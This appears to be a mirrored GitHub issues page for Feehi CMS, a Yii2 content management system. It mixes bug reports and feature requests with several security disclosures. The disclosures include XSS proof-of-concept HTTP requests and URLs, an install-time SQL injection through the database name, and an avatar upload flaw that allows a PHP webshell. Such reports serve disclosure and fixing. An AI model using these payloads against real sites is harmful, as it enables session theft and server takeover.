liufee / cms Goto Github PK
View Code? Open in Web Editor NEWFeehi CMS based on yii2
Home Page: http://demo.cms.feehi.com
License: Other
Feehi CMS based on yii2
Home Page: http://demo.cms.feehi.com
License: Other
目前UEDITOR编辑器上传地址写死了,复用性太差,建议还是采用模版传递参数的形式来控制,方便二开或者自定义。
Calling unknown method: feehi\web\Session::setCacheLimiter(),前台点击文章页出现这个问题
问题一:
上传出现双"/" 导致无法访问
https://www.xxx.com**//**uploads/ueditor/upload/image/20200211/xxxx.png
问题二:
使用了cdn所有想修改访问域名 请问如何修改
你的标签里面没有yii ,建议写上
1、菜单->前台菜单->编辑页面->Parent Menu项对应的下拉菜单显示的是后台菜单列表数据
2、运营管理->广告管理->广告类型(txt)之后出现如下错误:
htmlspecialchars() expects parameter 1 to be string, array given
前台的slider_right_2广告处用文本类型或者视频类型广告也会出错,发现源码中没有对广告类型进行判断后再输出相应的类型。
如题, 希望能加入下拉按钮组的样式
public $format = ['datetime', 'php:Y-m-d H:m'];
should modify to
public $format = ['datetime', 'php:Y-m-d H:i:s'];
There is only "yii.bat" in the root directory, missing "yii". It is unfriendly to *nix developers.
例如文章,使用每篇文章后面的删除不起作用,而且页面一直处于删除状态,毫无反应;但是可以使用最上面的那个删除,选中文章后删除,是可以的,这是为什么?难道只有我存在这种问题吗?
Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
Warning: Cannot modify header information - headers already sent in Unknown on line 0
[]
init方法下匿名函数不需要传递$this
Not Found (#404)
未找到分类合作伙伴
服务器在处理您的请求中发生了以上错误
如果您认为是我们的服务器错误,请告知我们,谢谢!
这种报错,怎么解决呢
Hello, i found Host Header Injection at FeehiCMS 2.1.1.
Description:
A Host Header Injection vulnerability in Feehi CMS 2.1.1 may allow an attacker to spoof a particular header. This can be exploited by abusing password reset emails.
PoC:
https://www.youtube.com/watch?v=k8dp0FJnSsI&ab_channel=IkariShinji
This is a Cross Site Scripting vulnerability. When the user name is <script>alert(1)<script> or js code, the pop-up alert will be triggered when browsing the post. Details are as follows:
POC example:
registered:
POST /index.php?r=site%2Fsignup HTTP/1.1
Host: demo.cms.feehi.com
Content-Length: 283
Cache-Control: max-age=0
Origin: http://demo.cms.feehi.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://demo.cms.feehi.com/index.php?r=site%2Fsignup
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601317
Connection: close
_csrf=gTY-NUvHDzoCLFGO7L9d7f4Mtqn3QkRnFFv0yq8jpF6wXllTE51rblN2PNSn8SWluzj73LIaAzBcP8aV2mfQGA%3D%3D&SignupForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&SignupForm%5Bemail%5D=12345678%40qq.com&SignupForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&signup-button=
login:
POST /index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
Content-Length: 296
Cache-Control: max-age=0
Origin: http://demo.cms.feehi.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601432
Connection: close
_csrf=DNiLSKN3vY4TpWeADWU7igas1i5rCbMJ-ewQrKYUQJg9sOwu-y3Z2kL_CtpGK0PCQ5ibWy5R9F6xiCLz01A03g%3D%3D&LoginForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=
How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
后台用百度编辑器上传图片时,选择不了gif动画图片,jpg图片可以选择。
当array存储到JSON字段,就会提示字符串与array格式的问题
类似的问题很多 很多时候表单提交与修改的变量是array,日志就会出错了。
另外 个别文件的命名空间首字母用了大写 LINUX上会找不到文件。
总体说 程序做的很棒,大量简化了开发时间! 支持下!
'mailer' => [
'class' => yii\swiftmailer\Mailer::className(),
'viewPath' => '@common/mail',
'useFileTransport' => false,//false发送邮件,true只是生成邮件在runtime文件夹下,不发邮件
'transport' => [
'class' => 'Swift_SmtpTransport',
'host' => ' smtp.163.com', //每种邮箱的host配置不一样
'username' => '[email protected]',
'password' => 'xxxxx',
'port' => '25',
'encryption' => 'tls',
],
'messageConfig' => [
'charset' => 'UTF-8',
'from' => ['[email protected]' => 'Feehi CMS']
],
],
common/config/main-local.php
没有,怎么处理
原因与 #46 相同, 可以使用相同方式修复
public function beforeValidate()
{
if($this->ad !== "0") {
$this->ad = UploadedFile::getInstance($this, "ad");
}
return parent::beforeValidate();
}
@
如何,想修改管理员头像图片的保存路径。 找了半天没找到地方
使用归档文件安装完然后访问注册或者登录页面会报JQUERY错误index.php?r=site%2Flogin:1574 Uncaught TypeError: jQuery(...).yiiActiveForm is not a function
at HTMLDocument. (index.php?r=site%2Flogin:1574)
at l (jquery.min.js:2)
at Object.fireWith [as resolveWith] (jquery.min.js:2)
at Function.ready (jquery.min.js:2)
at HTMLDocument.A (jquery.min.js:2)
GET http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8oxj66ons65elf2qv4rtf9p7aygo4d.burpcollaborator.net
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254900; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1
POST http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Origin: http://demo.cms.feehi.com
Connection: close
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254930; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1
_csrf=kgPC6DtyS_hxWBm1BRhqtuxuO1lKLvtXbXluSk4cmje_MKq5TkJ7iAQATtFcXh38ridoEydKuAY7SiQEAVLPeA%3D%3D&LoginForm%5Busername%5D=test123&LoginForm%5Bpassword%5D=123456&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=
Due to the lax filtering of tag parameters, JS code can be inserted to cause cross-site scripting attacks.If the tag parameter is assigned to "<script>alert(123)</script>".Submitting in get mode can cause cross-site script attack.
The exp code is as follows:
http://127.0.0.1/index.php?r=search%2Ftag&tag=<script>alert(123)</script>
首先我觉得作者的这种想法非常好。基于框架,以前我也尝试过多次从最初的ioize 到现在的laravel october 。一直在找寻一款比较优秀的cms. fee嗨让我看到了希望。谢谢作者。
建议融入layerUI2 ,后台增加下载模型,广告位管理,等
Hey there!
I belong to an open source security research community, and a member (@0xAmal) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Hi i found cross site scripting vulnerability on Feehi CMS via image upload.
POC:
please add rtl support for admin panel. thanks.
在安装初期,选择数据库名没有做过滤,导致sql注入
以其中一处举例
install\controllers\SiteController.php 315行
$dbname没有做任何限制
$db->createCommand("use $dbname")->execute();//判断用户名密码是否正确
$this->checkAccountPermission($db, $dbname);
使用burp拦截执行sleep比较,
sleep 响应时间
1 3087m
5 15030m
10 30009m
如下图
修复方式
限制变量$dbname,或修改SQL执行方式
需要加以限制的有3行
315
425
437
PHP 7.1 report that can not call none-static function checkPermission at backend when first init, once changed the function to be static , problem fixed.
In the background, you can upload the PHP file by changing the image suffix to PHP, resulting in command execution.
url:http://192.168.18.143/admin/index.php?r=admin-user%2Fupdate-self
Stored XSS, also known as persistent XSS, is more damaging than non-persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application.
Step To Reproduce:
Vulnerable cms URL: https://demo.cms.feehi.com/
Vulnerable Parameter: Comment_nickname:
1-Sing-up https://demo.cms.feehi.com/
2-Inject The XSS Payload in Username: "><script>alert(232)</script> fill all required fields and click the SignUp button
3-Go to any article then XSS will trigger.
Impact:
An XSS attack allows an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim, or for phishing attacks.
Docker cms 体验那里数据库名字写错了,要去里面改下。 另外后台用户名和密码没公布出来啊 admin 123456
这个文件好像是不存在的
FeehiCMS 2.0.8.1-hotfix版,前端注册的账密,第二天,就无法使用了.请问是什么原因呢?
Package guzzle/guzzle is abandoned, you should avoid using it. Use guzzlehttp/guzzle instead.
This is a Cross Site Scripting vulnerability appear two place(frontend and backend). When the lang is english"><script>alert(/xss/)</script>< or other js code, the pop-up alert will be triggered when browsing the feehi post. Details are as follows:
POC example:
http://demo.cms.feehi.com/index.php?r=site/language&lang=english"><script>alert(/xss/)</script><
or
http://demo.cms.feehi.com/admin/index.php?r=site/language&lang=english"><script>alert(/xss/)</script>
View any post and xss pop-up:
Hi,
Parameter tag is vulnerable.It is possible to exploit an XSS vulnerability through the following request
http://demo.cms.feehi.com/index.php?r=search/tag&tag=%3Cscript%3Ealert(document.cookie)%3C/script%3E
You can filter the parameters!!!
Yii::$app->user->setReturnUrl(Url::current());之后在 return $this->goBack(); 没有跳转到对应的控制器路径反而跳转到域名/assets/ebd9225d/jquery.js
There is an arbitrary file upload vulnerability in the background avatar upload.
The CMS only verified the suffix of the file in the front end by js, and we found that we could upload the PHP scripts directly after using Burp Suite for package capture modification.
The attacker can modify the box in the picture and upload the PHP script directly, It also returns the upload path(In the red box on the right of the figure above).
When the PHP file content is a Trojan, attackers can get the shell directly.
Here I used Behinder as a shell management tool, and getshell successfully.
Hi i found xss vuln on Feehi CMS Login Form.
What is XSS?
Attacker can inject and executee javascript code to webpage.
Feehi CMS response your input data on webpage. Like
So attacker can inject javascript code into webpage using form request.
POC Videos:
Note : youtube videos is unlisted video .So noone can see ,except who has video link.
之前提交过一个bug,说是congif配置文件,后面才发现是后台的staic/js/plugins/ueditor/dialogs/image/image.js里面的文件问题。大概在365行左右有如下代码
accept: { title: 'Images', extensions: acceptExtensions, mimeTypes: 'image/jpg,image/jpeg,image/png' },
只接受jpg、jpeg、png格式的图片上传,添加了image/gif之后就可以选择本地的gif图片上传了。
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.